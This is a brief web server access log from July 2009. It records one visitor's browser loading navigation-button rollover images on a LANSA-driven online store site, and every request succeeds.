112.199.157.170 - - [28/Jul/2009:02:30:14 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.157.170 - - [28/Jul/2009:02:30:15 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.157.170 - - [28/Jul/2009:02:30:15 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.157.170 - - [28/Jul/2009:02:30:16 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.157.170 - - [28/Jul/2009:02:30:16 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.157.170 - - [28/Jul/2009:02:30:17 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.199.157.170 - - [28/Jul/2009:02:30:17 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
